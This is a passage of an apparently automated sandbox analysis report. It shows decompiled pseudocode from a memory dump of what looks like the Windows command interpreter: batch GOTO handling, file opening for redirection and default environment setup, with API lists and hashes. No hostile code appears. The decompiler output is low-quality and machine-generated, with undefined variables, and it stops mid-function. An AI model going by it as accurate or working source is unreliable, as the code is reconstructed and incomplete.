				void* _v576;
				void* _v580;
				void* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t67;
				struct HINSTANCE__* _t71;
				struct HINSTANCE__* _t72;
				struct HINSTANCE__ _t74;
				int _t77;
				int _t82;
				struct HINSTANCE__* _t84;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t92;
				void* _t93;
				struct HINSTANCE__* _t94;
				struct HINSTANCE__* _t95;
				struct HINSTANCE__* _t96;
				struct HINSTANCE__* _t108;
				struct HINSTANCE__** _t111;
				void* _t112;
				struct HINSTANCE__* _t118;
				struct HINSTANCE__ _t124;
				struct HINSTANCE__* _t143;
				void* _t144;
				struct HINSTANCE__* _t145;
				struct HINSTANCE__* _t147;
				void* _t148;
				struct HINSTANCE__* _t149;
				signed int _t150;
				signed int _t152;
				void* _t153;

				_t136 = __edx;
				_t152 = (_t150 & 0xfffffff8) - 0x234;
				_t60 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t60 ^ _t152;
				_t111 = __ecx;
				_v556 = __edx;
				_t147 = 0;
				_t143 = 1;
				_v564 = 0;
				_v560 = 1;
				_v552 = 0;
				if( *0x373cc4 != __ecx) {
					L79:
					_t63 = _t147;
					goto L33;
				} else {
					L2:
					while(1) {
						if( *0x35d544 != 0) {
							E0035921A(_t111, _t143);
							_t136 = _v556;
						}
						 *0x35d590 = 0;
						if( *0x373cc9 == 0 || _t143 == 0) {
							L5:
							_t145 = E00340662(_t111);
							if(_t145 == 0xffffffff) {
								goto L74;
							}
							_t67 = E0033EEF0(3, _t145, _t111[4]);
							_t147 = _t67;
							__imp___tell(_t145);
							_t111[2] = _t67;
							_t153 = _t152 + 4;
							_t8 = _t145 - 3; // -3
							_t118 = 0;
							_t136 = _t145;
							if(_t8 > 0x5b) {
								L9:
								__imp___close(_t145);
								_t152 = _t153 + 4;
								if(_t147 == 0) {
									goto L42;
								}
								if(_t147 == 1 ||  *0x36f980 == 0x234a) {
									E003582EB(_t118);
									__eflags =  *0x35d0c8 - 1;
									if( *0x35d0c8 == 1) {
										__eflags =  *0x378530;
										if( *0x378530 == 0) {
											E00356FF0(_t118);
											E0033C108(_t118, 0x2371, 1, 0x363892);
											_t152 = _t152 + 0xc;
										}
									}
									E00359287(_t118);
									__imp__longjmp(0x36b8b8, 1);
									goto L79;
								} else {
									if(_t147 == 0xffffffff) {
										_t63 = _v564;
										goto L33;
									} else {
										_t143 = _v560;
										_t136 = _v552;
										goto L14;
									}
								}
							}
							if(_t145 > 0x1f) {
								_t49 = _t145 - 0x20; // -32
								_t108 = 1 + (_t49 >> 5);
								__eflags = _t108;
								_t118 = _t108;
								do {
									_t136 = _t136 - 0x20;
									_t108 = _t108 - 1;
									__eflags = _t108;
								} while (_t108 != 0);
							}
							asm("btr eax, edx");
							goto L9;
						} else {
							__eflags =  *((short*)( *((intOrPtr*)(_t136 + 0x38)))) - 0x3a;
							if( *((short*)( *((intOrPtr*)(_t136 + 0x38)))) != 0x3a) {
								goto L5;
							}
							_t147 = E003400B0(0x50);
							__eflags = _t147;
							if(_t147 == 0) {
								L74:
								_t63 = 1;
								L33:
								_pop(_t144);
								_pop(_t148);
								_pop(_t112);
								__eflags = _v8 ^ _t152;
								return E00346FD0(_t63, _t112, _v8 ^ _t152, _t136, _t144, _t148);
							}
							_t147->i = 0;
							_t71 = E0033DF40(L"GOTO");
							 *(_t147 + 0x38) = _t71;
							__eflags = _t71;
							if(_t71 == 0) {
								goto L74;
							}
							_t72 = E0033DF40( *((intOrPtr*)(_v556 + 0x38)));
							 *(_t147 + 0x3c) = _t72;
							__eflags = _t72;
							if(_t72 == 0) {
								goto L74;
							}
							_t136 = 1;
							_t72->i = 0x20;
							 *(_t147 + 0x40) = 0;
							_v552 = 1;
							L14:
							if(_t143 != 0) {
								__eflags = _t147;
								if(_t147 != 0) {
									_v560 = 0;
								}
							}
							_t124 = _t147->i;
							if(_t124 != 0 ||  *( *(_t147 + 0x38)) != 0x3a) {
								if(_t136 != 0) {
									_v552 = 0;
									_t74 = _t124;
								} else {
									_t74 = _t124;
									if( *0x35d0c8 == 1) {
										_t74 = _t124;
										__eflags = _t124 - 0x3b;
										if(_t124 != 0x3b) {
											__eflags =  *0x378530;
											_t74 = _t124;
											if( *0x378530 == 0) {
												E00356FF0(_t124);
												_t136 = 0;
												E00352ED0(_t147, 0);
												E003425D9(L"\r\n");
												_t74 = _t147->i;
												_t152 = _t152 + 4;
											}
										}
									}
								}
								if(_t74 == 0x3b) {
									_t147 =  *(_t147 + 0x38);
								}
								_v28 = 0;
								_v24 = 1;
								 *(_t152 + 0x23c) = 0x104;
								memset(_t152 + 0x24, 0, 0x104);
								_t152 = _t152 + 0xc;
								if(_v24 == 0) {
									_t77 = 0x104;
								} else {
									_t77 = 0x7fe7;
								}
								if(E00340C70(_t152 + 0x24, _t77) < 0) {
									E00340DE8(_t78, _t152 + 0x20);
									goto L74;
								} else {
									if(_t147 == 0) {
										_t147 = 0;
										_v564 = 0;
										L29:
										__imp__??_V@YAXPAX@Z(_v28);
										_t152 = _t152 + 4;
										goto L30;
									}
									if( *_t147 != 0 || E0033DFC0(0x2a,  *(_t147 + 0x38),  &_v564) != 0xffffffff) {
										L26:
										_t136 = _t147;
										_v564 = E00340E00(2, _t147);
										E003406C0(2);
										_t82 = GetConsoleOutputCP();
										 *0x363854 = _t82;
										GetCPInfo(_t82, 0x363840);
										_t149 =  *0x35d5f8; // 0x0
										if(_t149 == 0) {
											_t84 =  *0x35d0d0; // 0xffffffff
											__eflags = _t84 - 0xffffffff;
											if(_t84 != 0xffffffff) {
												L68:
												__eflags = _t84;
												if(_t84 != 0) {
													_t149 = GetProcAddress(_t84, "SetThreadUILanguage");
													 *0x35d5f8 = _t149;
												}
												L70:
												__eflags = _t149;
												if(_t149 != 0) {
													goto L27;
												}
												SetThreadLocale(0x409);
												L28:
												_t147 = _v568;
												goto L29;
											}
											_t84 = GetModuleHandleW(L"KERNEL32.DLL");
											_t149 =  *0x35d5f8; // 0x0
											 *0x35d0d0 = _t84;
											__eflags = _t84 - 0xffffffff;
											if(_t84 == 0xffffffff) {
												goto L70;
											}
											goto L68;
										}
										L27:
										 *0x3794b4(0);
										_t149->i();
										goto L28;
									} else {
										_t91 = E0033D7D4( *(_t147 + 0x38), 0x2a);
										__eflags = _t91;
										if(_t91 != 0) {
											goto L26;
										}
										_t44 = _t91 + 0x3f; // 0x3f
										_t92 = E0033D7D4( *(_t147 + 0x38), _t44);
										__eflags = _t92;
										if(_t92 != 0) {
											goto L26;
										}
										_t141 = _v28;
										__eflags = _v28;
										if(__eflags == 0) {
											_t141 = _t152 + 0x20;
										}
										_t93 = E003410B0(_t147, _t141, __eflags,  *((intOrPtr*)(_t152 + 0x230)));
										__eflags = _t93 - 2;
										if(_t93 != 2) {
											goto L26;
										} else {
											__eflags =  *(_t147 + 0x34);
											if( *(_t147 + 0x34) == 0) {
												L62:
												_t94 = _v28;
												__eflags = _t94;
												if(__eflags == 0) {
													_t94 = _t152 + 0x20;
												}
												_t136 =  *_t111;
												_push(_t94);
												_push(_t111[1]);
												_t95 = E00341F52(_t111, _t147,  *_t111, _t143, _t147, __eflags);
												__eflags = _t95;
												if(_t95 != 0) {
													goto L72;
												} else {
													_t147 = 0;
													_v568 = 1;
													_v572 = 0;
													goto L29;
												}
											} else {
												_t136 = _t147;
												_t96 = E003576C0(_v556, _t147);
												__eflags = _t96;
												if(_t96 != 0) {
													L72:
													__imp__??_V@YAXPAX@Z(_v36);
													_t152 = _t152 + 4;
													_t63 = 1;
													goto L33;
												}
												goto L62;
											}
										}
									}
								}
							} else {
								L42:
								_t147 = _v564;
								L30:
								if( *0x373cc4 != _t111) {
									goto L79;
								}
								_t143 = _v560;
								_t136 = _v556;
								continue;
							}
						}
					}
				}
			}

0x0033e560
0x0033e568
0x0033e56e
0x0033e575
0x0033e57f
0x0033e581
0x0033e585
0x0033e589
0x0033e58e
0x0033e592
0x0033e596
0x0033e5a0
0x0034c011
0x0034c011
0x00000000
0x0033e5a6
0x00000000
0x0033e5b0
0x0033e5b7
0x0034be97
0x0034be9c
0x0034be9c
0x0033e5c4
0x0033e5cb
0x0033e5d5
0x0033e5dc
0x0033e5e1
0x00000000
0x00000000
0x0033e5f1
0x0033e5f7
0x0033e5f9
0x0033e5ff
0x0033e602
0x0033e605
0x0033e608
0x0033e60a
0x0033e60f
0x0033e62b
0x0033e62c
0x0033e632
0x0033e637
0x00000000
0x00000000
0x0033e640
0x0034bfcf
0x0034bfd4
0x0034bfdb
0x0034bfdd
0x0034bfe4
0x0034bfe6
0x0034bff7
0x0034bffc
0x0034bffc
0x0034bfe4
0x0034bfff
0x0034c00b
0x00000000
0x0033e656
0x0033e659
0x0033e794
0x00000000
0x0033e65f
0x0033e65f
0x0033e663
0x00000000
0x0033e663
0x0033e659
0x0033e640
0x0033e614
0x0034bea5
0x0034beab
0x0034beab
0x0034beac
0x0034beae
0x0034beae
0x0034beb1
0x0034beb1
0x0034beb1
0x0034beb6
0x0033e621
0x00000000
0x0033e7ad
0x0033e7b0
0x0033e7b4
0x00000000
0x00000000
0x0033e7c4
0x0033e7c6
0x0033e7c8
0x0034bfc5
0x0034bfc5
0x0033e798
0x0033e79f
0x0033e7a0
0x0033e7a1
0x0033e7a2
0x0033e7ac
0x0033e7ac
0x0033e7d3
0x0033e7d9
0x0033e7de
0x0033e7e1
0x0033e7e3
0x00000000
0x00000000
0x0033e7f0
0x0033e7f5
0x0033e7f8
0x0033e7fa
0x00000000
0x00000000
0x0033e805
0x0033e80a
0x0033e80d
0x0033e814
0x0033e667
0x0033e669
0x0033e81d
0x0033e81f
0x0033e827
0x0033e827
0x0033e81f
0x0033e66f
0x0033e673
0x0033e684
0x0033e832
0x0033e836
0x0033e68a
0x0033e691
0x0033e693
0x0033e89d
0x0033e89f
0x0033e8a2
0x0034bebb
0x0034bec2
0x0034bec4
0x0034beca
0x0034becf
0x0034bed3
0x0034bedd
0x0034bee2
0x0034bee4
0x0034bee4
0x0034bec4
0x0033e8a2
0x0033e693
0x0033e69c
0x0033e846
0x0033e846
0x0033e6ab
0x0033e6b9
0x0033e6c1
0x0033e6cc
0x0033e6d1
0x0033e6dc
0x0034beec
0x0033e6e2
0x0033e6e2
0x0033e6e2
0x0033e6f3
0x0034bfc0
0x00000000
0x0033e6f9
0x0033e6fb
0x0034bef6
0x0034bef8
0x0033e76b
0x0033e772
0x0033e778
0x00000000
0x0033e778
0x0033e704
0x0033e721
0x0033e721
0x0033e72d
0x0033e731
0x0033e736
0x0033e742
0x0033e747
0x0033e74d
0x0033e755
0x0034bf4d
0x0034bf52
0x0034bf55
0x0034bf72
0x0034bf72
0x0034bf74
0x0034bf82
0x0034bf84
0x0034bf84
0x0034bf8a
0x0034bf8a
0x0034bf8c
0x00000000
0x00000000
0x0034bf97
0x0033e767
0x0033e767
0x00000000
0x0033e767
0x0034bf5c
0x0034bf62
0x0034bf68
0x0034bf6d
0x0034bf70
0x00000000
0x00000000
0x00000000
0x0034bf70
0x0033e75b
0x0033e75f
0x0033e765
0x00000000
0x0033e84e
0x0033e856
0x0033e85b
0x0033e85d
0x00000000
0x00000000
0x0033e866
0x0033e869
0x0033e86e
0x0033e870
0x00000000
0x00000000
0x0033e876
0x0033e87d
0x0033e87f
0x0033e8ad
0x0033e8ad
0x0033e88a
0x0033e88f
0x0033e892
0x00000000
0x0033e898
0x0034bf01
0x0034bf05
0x0034bf1a
0x0034bf1a
0x0034bf21
0x0034bf23
0x0034bf25
0x0034bf25
0x0034bf29
0x0034bf2d
0x0034bf2e
0x0034bf31
0x0034bf36
0x0034bf38
0x00000000
0x0034bf3a
0x0034bf3a
0x0034bf3c
0x0034bf44
0x00000000
0x0034bf44
0x0034bf07
0x0034bf0b
0x0034bf0d
0x0034bf12
0x0034bf14
0x0034bfa2
0x0034bfa9
0x0034bfaf
0x0034bfb2
0x00000000
0x0034bfb2
0x00000000
0x0034bf14
0x0034bf05
0x0033e892
0x0033e704
0x0033e83d
0x0033e83d
0x0033e83d
0x0033e77b
0x0033e781
0x00000000
0x00000000
0x0033e787
0x0033e78b
0x00000000
0x0033e78b
0x0033e673
0x0033e5cb
0x0033e5b0

APIs

_tell.MSVCRT ref: 0033E5F9
_close.MSVCRT ref: 0033E62C
memset.MSVCRT ref: 0033E6CC
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0033E736
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00363840), ref: 0033E747
??_V@YAXPAX@Z.MSVCRT ref: 0033E772

Strings

GOTO, xrefs: 0033E7CE
KERNEL32.DLL, xrefs: 0034BF57
SetThreadUILanguage, xrefs: 0034BF76

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ConsoleInfoOutput_close_tellmemset
String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
API String ID: 1380661413-3584302480
Opcode ID: b32ecc91d60b19fe6e438182a8f380c2773b2b69f40b878b05a077c4f67c988d
Instruction ID: d8b566af11c3cc4b5b23031ecbadb45e124705b758aef652367e9d3bc2b4d06a
Opcode Fuzzy Hash: b32ecc91d60b19fe6e438182a8f380c2773b2b69f40b878b05a077c4f67c988d
Instruction Fuzzy Hash: A9B1B370604301CBD737DF24D88572AB7E9AF84714F150929F84A9B6E1EB70ED89CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0033D120, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177
fileCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0033D120(long __ecx, signed int __edx) {
				void _v8;
				long _v12;
				long _v16;
				long _v20;
				signed int _v24;
				long _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				signed int _t34;
				long _t37;
				void* _t41;
				signed int _t44;
				signed int _t49;
				int _t54;
				signed char _t64;
				void* _t67;
				signed int _t71;
				long _t75;
				void* _t76;
				signed int _t78;
				signed int _t79;
				void* _t81;

				_t65 = __ecx;
				_t75 = 3;
				_v20 = __ecx;
				_t64 = __edx;
				_v16 = 3;
				_t71 = __edx & 0x00000003;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor = 0;
				_v40.nLength = 0xc;
				if(_t71 > 2) {
					L2:
					return _t34 | 0xffffffff;
				}
				_t34 = __edx & 0x00000009;
				if(_t34 != 9) {
					if(_t71 != 0) {
						_t78 = 0x40000000;
						__imp___wcsicmp(__ecx, L"con");
						_t81 = _t81 + 8;
						if(_t34 != 0) {
							_t75 = 1;
							_v16 = 1;
						}
						_t65 = _v20;
						_t37 = 2;
					} else {
						_t78 = 0x80000000;
						_t37 = 3;
					}
					_push(0);
					_push(0x80);
					if(_t64 == 0x10a) {
						_t41 = CreateFileW(_t65, _t78 | 0x80000000, _t75,  &_v40, 3, ??, ??);
						_t76 = _t41;
						if(_t76 != 0xffffffff) {
							goto L9;
						}
						_push(0);
						_push(0x80);
						_push(4);
						_push( &_v40);
						_push(_v16);
						_push(_t78);
						_push(_v20);
						goto L8;
					} else {
						_push(_t37);
						_push( &_v40);
						_push(_t75);
						_push(_t78);
						_push(_t65);
						L8:
						_t41 = CreateFileW();
						_t76 = _t41;
						if(_t76 == 0xffffffff) {
							_t54 = GetLastError();
							 *0x373cf0 = _t54;
							if(_t54 == 0x6e) {
								 *0x373cf0 = 2;
							}
							L28:
							_t44 = _t54 | 0xffffffff;
							L14:
							return _t44;
						}
						L9:
						__imp___open_osfhandle(_t76, 8);
						_t79 = _t41;
						if((_t64 & 0x00000008) != 0) {
							if(E00340178(_t41) != 0) {
								goto L10;
							}
							_t49 = GetFileSize(_t76,  &_v20);
							_v24 = _t49;
							if((_t49 | _v20) == 0) {
								goto L10;
							}
							_v12 = 0xffffffff;
							_v8 = 0;
							if(SetFilePointer(_t76, 0xffffffff,  &_v12, 2) == 0xffffffff) {
								_t54 = GetLastError();
								 *0x373cf0 = _t54;
								if(_t54 == 0) {
									goto L23;
								}
								if(_t79 == 0xffffffff) {
									_t54 = CloseHandle(_t76);
								} else {
									__imp___close(_t79);
								}
								goto L28;
							}
							L23:
							if(ReadFile(_t76,  &_v8, 1,  &_v28, 0) == 0) {
								_v12 = 0;
								SetFilePointer(_t76, 0,  &_v12, 2);
							}
							if(_v8 == 0x1a) {
								_v12 = 0xffffffff;
								SetFilePointer(_t76, 0xffffffff,  &_v12, 2);
							}
						}
						L10:
						_t9 = _t79 - 3; // -3
						_t67 = 0;
						if(_t9 <= 0x5b) {
							if(_t79 > 0x1f) {
								_t33 = _t79 - 0x20; // -32
								_t67 = (_t33 >> 5) + 1;
							}
							asm("bts eax, edx");
						}
						_t44 = _t79;
						goto L14;
					}
				}
				goto L2;
			}

0x0033d120
0x0033d12a
0x0033d12f
0x0033d132
0x0033d134
0x0033d137
0x0033d139
0x0033d140
0x0033d147
0x0033d151
0x0033d15c
0x00000000
0x0033d15c
0x0033d155
0x0033d15a
0x0033d16a
0x0033d1ea
0x0033d1ef
0x0033d1f5
0x0033d1fa
0x0033d1fc
0x0033d201
0x0033d201
0x0033d204
0x0033d207
0x0033d16c
0x0033d16c
0x0033d171
0x0033d171
0x0033d173
0x0033d175
0x0033d180
0x0033d221
0x0033d227
0x0033d22c
0x00000000
0x00000000
0x0033d232
0x0033d234
0x0033d239
0x0033d23e
0x0033d23f
0x0033d242
0x0033d243
0x00000000
0x0033d186
0x0033d186
0x0033d18a
0x0033d18b
0x0033d18c
0x0033d18d
0x0033d18e
0x0033d18e
0x0033d194
0x0033d199
0x0034b555
0x0034b55b
0x0034b563
0x0034b565
0x0034b565
0x0034b56f
0x0034b56f
0x0033d1de
0x00000000
0x0033d1de
0x0033d19f
0x0033d1a2
0x0033d1ab
0x0033d1b0
0x0033d254
0x00000000
0x00000000
0x0033d25f
0x0033d265
0x0033d26b
0x00000000
0x00000000
0x0033d273
0x0033d27c
0x0033d290
0x0034b577
0x0034b57d
0x0034b584
0x00000000
0x00000000
0x0034b58d
0x0034b59c
0x0034b58f
0x0034b590
0x0034b596
0x00000000
0x0034b58d
0x0033d296
0x0033d2ab
0x0034b5a9
0x0034b5b4
0x0034b5b4
0x0033d2b6
0x0034b5c4
0x0034b5cf
0x0034b5cf
0x0033d2b6
0x0033d1b6
0x0033d1b6
0x0033d1b9
0x0033d1c0
0x0033d1c5
0x0034b5da
0x0034b5e2
0x0034b5e8
0x0033d1d2
0x0033d1d5
0x0033d1dc
0x00000000
0x0033d1dc
0x0033d180
0x00000000

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 0033D18E
_open_osfhandle.MSVCRT ref: 0033D1A2
_wcsicmp.MSVCRT ref: 0033D1EF
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,0035F830,00002000), ref: 0033D221
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 0033D25F
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 0033D287
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 0033D2A3
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 0034B5B4
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 0034B5CF

Strings

con, xrefs: 0033D1E4

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
String ID: con
API String ID: 686027947-4257191772
Opcode ID: 1a703b93f033460124899307c0deb9e0661518909c4deebe55b010229c684e11
Instruction ID: 03611124de9712d9e318e74942077d57c0c34fc0c1fa79ceaea7f426fc866357
Opcode Fuzzy Hash: 1a703b93f033460124899307c0deb9e0661518909c4deebe55b010229c684e11
Instruction Fuzzy Hash: F951D670E00205ABEB238B64AC89BBEB7BDEB45720F110355F929E72D0D770D9458761

Uniqueness

Uniqueness Score: -1.00%

Function 0033CEA9, Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 167
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0033CEA9() {
				signed int _v8;
				long _v12;
				char _v16;
				int _v20;
				void _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				WCHAR* _t41;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				void* _t53;
				int _t55;
				void* _t56;
				struct HINSTANCE__* _t78;
				signed int _t79;
				struct HINSTANCE__* _t81;
				void* _t85;
				int* _t88;
				void* _t89;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t96;
				signed int _t98;

				_t30 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t30 ^ _t98;
				_t91 = 0;
				_v12 = 0x104;
				_v20 = 0;
				_v16 = 1;
				memset( &_v540, 0, 0x104);
				if(E00340C70( &_v540, ((0 | _v16 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					do {
						__eflags = E00344B60(__eflags, 0);
					} while (__eflags == 0);
					exit(1);
					L13:
					_t41 =  &_v540;
					L2:
					GetModuleFileNameW(_t91, _t41, _v12);
					if(E0033CFBC(L"PATH") == 0) {
						E00343A50(L"PATH", 0x3324ac);
					}
					if(E0033CFBC(L"PATHEXT") == 0) {
						E00343A50(L"PATHEXT", L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
					}
					_t95 = L"PROMPT";
					if(E0033CFBC(L"PROMPT") == 0) {
						E00343A50(L"PROMPT", L"$P$G");
					}
					if(E0033CFBC(L"COMSPEC") == 0) {
						_t68 = _v20;
						__eflags = _v20;
						if(_v20 == 0) {
							_t68 =  &_v540;
						}
						_t85 = 0x2e;
						_t50 = E0033D7D4(_t68, _t85);
						__eflags = _t50;
						if(_t50 != 0) {
							L33:
							_t86 = _v20;
							__eflags = _v20;
							if(_v20 == 0) {
								_t86 =  &_v540;
							}
							E00343A50(L"COMSPEC", _t86);
							goto L6;
						} else {
							__imp___wcsupr(L"CMD.EXE");
							_t78 = _v20;
							_t96 = _t78;
							__eflags = _t78;
							if(_t78 == 0) {
								_t96 =  &_v540;
							}
							_t88 =  &(_t96->i);
							do {
								_t55 = _t96->i;
								_t96 =  &(_t96->i);
								__eflags = _t55 - _t91;
							} while (_t55 != _t91);
							_t91 = _t78;
							_t95 = _t96 - _t88 >> 1;
							__eflags = _t78;
							if(_t78 == 0) {
								_t91 =  &_v540;
								_t78 = _t91;
							}
							_t89 = 0x5c;
							_t56 = E00342349(_t78, _t89);
							_t79 = _t95 - 1;
							__eflags = _t91 + _t79 * 2 - _t56;
							_t81 = _v20;
							if(_t91 + _t79 * 2 == _t56) {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"CMD.EXE");
							} else {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"\\CMD.EXE");
							}
							E003418C0(_t81, _v12);
							goto L33;
						}
					} else {
						L6:
						_t52 = E0033CFBC(L"KEYS");
						if(_t52 != 0) {
							__imp___wcsicmp(_t52, L"ON");
							__eflags = _t52;
							if(__eflags == 0) {
								 *0x37852c = 1;
							}
						}
						_t73 =  *0x373cb8;
						_t109 =  *0x373cb8;
						if( *0x373cb8 == 0) {
							_t73 = 0x373ab0;
						}
						_t53 = E003433FC(1, _t73, 1, _t91, _t95, _t109);
						__imp__??_V@YAXPAX@Z();
						return E00346FD0(_t53, 1, _v8 ^ _t98, 1, _t91, _t95, _v20);
					}
				}
				_t41 = _v20;
				if(_t41 == 0) {
					goto L13;
				}
				goto L2;
			}

0x0033ceb4
0x0033cebb
0x0033cecc
0x0033cece
0x0033ced4
0x0033ceda
0x0033cedd
0x0033cf03
0x0034b419
0x0034b41f
0x0034b41f
0x0034b424
0x0034b42a
0x0034b42a
0x0033cf14
0x0033cf19
0x0033cf2d
0x0034b43c
0x0034b43c
0x0033cf41
0x0034b44d
0x0034b44d
0x0033cf47
0x0033cf55
0x0033cfae
0x0033cfae
0x0033cf63
0x0034b457
0x0034b45a
0x0034b45c
0x0034b45e
0x0034b45e
0x0034b466
0x0034b467
0x0034b46c
0x0034b46e
0x0034b4e8
0x0034b4e8
0x0034b4eb
0x0034b4ed
0x0034b4ef
0x0034b4ef
0x0034b4fa
0x00000000
0x0034b470
0x0034b475
0x0034b47c
0x0034b47f
0x0034b481
0x0034b483
0x0034b485
0x0034b485
0x0034b48b
0x0034b48e
0x0034b48e
0x0034b491
0x0034b494
0x0034b494
0x0034b49b
0x0034b49d
0x0034b49f
0x0034b4a1
0x0034b4a3
0x0034b4a9
0x0034b4a9
0x0034b4ad
0x0034b4ae
0x0034b4b3
0x0034b4b9
0x0034b4bb
0x0034b4be
0x0034b4d1
0x0034b4d3
0x0034b4d5
0x0034b4d5
0x0034b4db
0x0034b4c0
0x0034b4c0
0x0034b4c2
0x0034b4c4
0x0034b4c4
0x0034b4ca
0x0034b4ca
0x0034b4e3
0x00000000
0x0034b4e3
0x0033cf69
0x0033cf69
0x0033cf6e
0x0033cf75
0x0034b50a
0x0034b512
0x0034b514
0x0034b51a
0x0034b51a
0x0034b514
0x0033cf7b
0x0033cf81
0x0033cf83
0x0033cfb5
0x0033cfb5
0x0033cf87
0x0033cf8f
0x0033cfa6
0x0033cfa6
0x0033cf63
0x0033cf09
0x0033cf0e
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 0033CEDD

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 0033CF19

Part of subcall function 0033CFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0035F830,00002000,?,?,?,?,?,0034373A,0033590A,00000000), ref: 0033CFDF

Part of subcall function 0033CFBC: _wcsicmp.MSVCRT ref: 0033D005
Part of subcall function 0033CFBC: _wcsicmp.MSVCRT ref: 0033D01B
Part of subcall function 0033CFBC: _wcsicmp.MSVCRT ref: 0033D031
Part of subcall function 0033CFBC: _wcsicmp.MSVCRT ref: 0033D047
Part of subcall function 0033CFBC: _wcsicmp.MSVCRT ref: 0033D05D
Part of subcall function 0033CFBC: _wcsicmp.MSVCRT ref: 0033D073
Part of subcall function 0033CFBC: _wcsicmp.MSVCRT ref: 0033D085
Part of subcall function 0033CFBC: _wcsicmp.MSVCRT ref: 0033D09B

??_V@YAXPAX@Z.MSVCRT ref: 0033CF8F
exit.MSVCRT ref: 0034B424
_wcsupr.MSVCRT ref: 0034B475

Strings

$P$G, xrefs: 0033CFA7
COMSPEC, xrefs: 0033CF57, 0034B4F5
KEYS, xrefs: 0033CF69
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 0034B446
PROMPT, xrefs: 0033CF47
PATH, xrefs: 0033CF1F
\CMD.EXE, xrefs: 0034B4CA
PATHEXT, xrefs: 0033CF33

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
API String ID: 2336066422-4197029667
Opcode ID: 1fe0d2cbac748dc52c38a681c83a7e0032aa075dc2f10b70a3c5bca7aaf3a2f5
Instruction ID: 32015884aff70bae5cedf91aa10058d456ccef5054d14e635f8c4b39729d5411
Opcode Fuzzy Hash: 1fe0d2cbac748dc52c38a681c83a7e0032aa075dc2f10b70a3c5bca7aaf3a2f5
Instruction Fuzzy Hash: 2451C335A0021997DF27DB628CD56BEB3B9AF50314F01416DE806AF292DF34EE45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003433FC, Relevance: 24.3, APIs: 16, Instructions: 307
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E003433FC(short __ebx, WCHAR* __ecx, WCHAR* __edx, WCHAR* __edi, void* __esi, void* __eflags) {
				void* _t75;
				short _t86;
				WCHAR* _t87;
				WCHAR* _t88;
				signed short* _t90;
				short _t93;
				int _t94;
				WCHAR* _t96;
				WCHAR* _t105;
				short _t109;
				WCHAR* _t113;
				WCHAR* _t115;
				WCHAR* _t125;
				signed int _t126;
				void* _t131;
				WCHAR* _t142;
				WCHAR* _t145;
				WCHAR* _t153;
				short* _t164;
				WCHAR* _t166;
				signed int _t168;
				WCHAR* _t169;
				short* _t176;
				void* _t177;

				_t173 = __edi;
				_t135 = __ebx;
				_push(0x240);
				_push(0x35bdd8);
				E003475CC(__ebx, __edi, __esi);
